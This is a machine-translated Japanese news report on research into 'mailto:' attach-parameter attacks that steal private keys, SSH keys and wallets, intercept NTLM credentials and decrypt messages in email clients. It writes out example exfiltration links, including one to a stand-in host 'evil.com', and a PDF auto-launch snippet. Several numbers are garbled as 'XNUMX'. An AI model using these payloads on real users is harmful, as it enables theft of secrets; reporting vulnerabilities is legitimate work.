ルール大学ボーフム(ドイツ)の研究者 () 高度なパラメーターを使用して「mailto:」リンクを処理するときのメール クライアントの動作。 調査した XNUMX 個の電子メール クライアントのうち XNUMX 個は、「attach」パラメータを使用してリソース置換を操作する攻撃に対して脆弱でした。 さらに XNUMX 台の電子メール クライアントが PGP および S/MIME キー置換攻撃に対して脆弱であり、XNUMX 台のクライアントが暗号化されたメッセージの内容を抽出する攻撃に対して脆弱でした。
リンク «「リンクで指定された宛先に手紙を書くために電子メール クライアントを開くことを自動化するために使用されます。 アドレスに加えて、リンクの一部として、レターの件名や一般的な内容のテンプレートなどの追加パラメータを指定できます。 提案された攻撃は、生成されたメッセージに添付ファイルを添付できるようにする「attach」パラメータを操作します。
メール クライアント Thunderbird、GNOME Evolution (CVE-2020-11879)、KDE KMail (CVE-2020-11880)、IBM/HCL Notes (CVE-2020-4089)、および Pegasus Mail は、自動的に添付できる簡単な攻撃に対して脆弱でした。 「mailto:?attach=path_to_file」のようなリンクを介して指定されたローカル ファイル。 警告が表示されずにファイルが添付されるため、ユーザーは特別な注意をしないと添付ファイルが送信されることに気付かない可能性があります。
たとえば、「mailto:」のようなリンクを使用します。[メール保護]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" を使用すると、GnuPG からの秘密キーをレターに挿入できます。 暗号ウォレット (~/.bitcoin/wallet.dat)、SSH キー (~/.ssh/id_rsa)、およびユーザーがアクセスできるファイルの内容を送信することもできます。 さらに、Thunderbird では、「attach=/tmp/*.txt」のような構成を使用して、マスクによってファイルのグループを添付できます。
一部の電子メール クライアントは、ローカル ファイルに加えて、ネットワーク ストレージへのリンクと IMAP サーバー内のパスを処理します。 特に、IBM Notes では、「attach=\\evil.com\dummyfile」のようなリンクを処理するときにネットワーク ディレクトリからファイルを転送したり、攻撃者が制御する SMB サーバーにリンクを送信することで NTLM 認証パラメータを傍受したりすることができます。 (リクエストは現在の認証パラメータを使用して送信されます)。
Thunderbird は、「attach=imap:///fetch>UID>/INBOX>1/」のようなリクエストを正常に処理します。これにより、IMAP サーバー上のフォルダーからコンテンツを添付できるようになります。 同時に、IMAP から取得され、OpenPGP および S/MIME 経由で暗号化されたメッセージは、送信前にメール クライアントによって自動的に復号化されます。 サンダーバードの開発者は、 XNUMX月号と今号の問題について この問題はすでに修正されています (Thunderbird ブランチ 52、60、および 68 は依然として脆弱です)。
古いバージョンの Thunderbird は、研究者が提案した PGP および S/MIME 上の他の 2 つの攻撃亜種に対しても脆弱でした。 特に、Thunderbird、OutLook、PostBox、eM Client、MailMate、および R2MailXNUMX は、メール クライアントが S/MIME メッセージで送信された新しい証明書を自動的にインポートしてインストールするという事実によって引き起こされるキー置換攻撃の対象となりました。攻撃者は、ユーザーがすでに保存している公開鍵の置き換えを組織します。
60 番目の攻撃は、Thunderbird、PostBox、および MailMate が影響を受けやすいもので、下書きメッセージを自動保存するメカニズムの機能を操作し、mailto パラメーターを使用して、暗号化されたメッセージの復号化や任意のメッセージのデジタル署名の追加を開始できるようにします。その後、結果が攻撃者の IMAP サーバーに送信されます。 この攻撃では、暗号文は「body」パラメータを介して送信され、「メタ リフレッシュ」タグを使用して攻撃者の IMAP サーバーへの呼び出しが開始されます。 例えば: ' '
ユーザーの介入なしで「mailto:」リンクを自動的に処理するには、特別に設計された PDF ドキュメントを使用できます。PDF の OpenAction アクションを使用すると、ドキュメントを開くときに mailto ハンドラーを自動的に起動できます。
%PDF-1.5
1 0 オブジェクト
<< /Type /Catalog /OpenAction [2 0 R] >>
エンドオブジェクト
2 0 オブジェクト
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
エンドオブジェクト
出所: オープンネット.ru